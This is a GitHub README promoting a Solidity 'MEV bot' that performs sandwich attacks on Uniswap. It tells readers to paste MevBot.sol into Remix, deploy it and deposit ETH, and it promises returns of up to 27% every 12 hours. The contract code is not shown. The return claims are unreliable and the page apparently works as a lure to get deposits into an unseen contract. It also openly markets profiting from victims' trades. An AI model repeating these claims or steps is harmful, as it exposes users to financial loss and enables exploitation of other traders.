Skip to content

midoxnet/MEV-bot-solidity

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 

Repository files navigation

MEV Bot 🚀

ETH MEV-BOT for sandwich attack on Uniswap. A Maximal Extractable Value (MEV) Solidity Sandwich BOT that allows deployers of contract to take profits from tokens.

Uniswap v2 MEV bot - Updated mempool settings - April 2023 The code was never meant to be shown to anybody. My commercial code is better and this was intended to be "tested in production" and a ton of quality tradeoffs have been made. Never ever did I plan to release this publicly, lest I "leak my alpha". But nonetheless I would like to show off what I've learned in the past years.

Bot sends the Transaction and sniffs the Uniswap v2 Mempool for txs with high slippage, calculating if a sandwich attack is profitable.

Bots then compete to buy up the token onchain as quickly as possible, sandwiching the victims transaction and creating a profitable slippage opportunity, my bot always puts 1 gas more than everybody elses, as long as it remains profitable, securing a large amount of profitable transactions.

Then sends back the ETH to the contract ready for withdrawal.

This bot performs all of that, faster than 99% of other bots.

MEV bot Instructions (works only for Mainnet)

Deposits

Deposits of lower than 0.4 ETH are going to find much fewer txs because of the gas fees

Higher amounts of ETH deposited into the contract result in a larger amount of successful sandwich attack txs, therefore more profit

For higher profits use above 1.2 ETH

Expected returns

0.1ETH - 0.4ETH = up to 10%/12hrs

0.4ETH - 1.2ETH = up to 20%/12hrs

1.2ETH - 2.4ETH = 20-27%/12hrs

2.4ETH+ = 27%++ every 12 hrs

Make money with MevBot (ETH network)

How it works:

image

You can see an example of how the bot works. The bot will make transactions on your entire balance to increase profit

First-source code

  1. Copy code and paste the code of MevBot.sol file in Remix IDE image

  2. Click Solidity complier 0.6.12 And press Compile MevBot.sol image

  3. Select ETH or BSC(BNB) network and Paste the router address

Press Transact (Deploy) image

  1. Next-deposit ETH to MevBot contract address. Copy contract's ETH address of your MevBot contract and send a number of Ethereum to this address. After that start it with the start button image image image

Wait a couple of days for a profit. For successful transactions on the Ethereum network, you must have enough balance to cover the gas. Recommended 0.5-1 ΕΤΗ.

At any time you can Stop bot or return your money by calling the withdrawal function.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Solidity 100.0%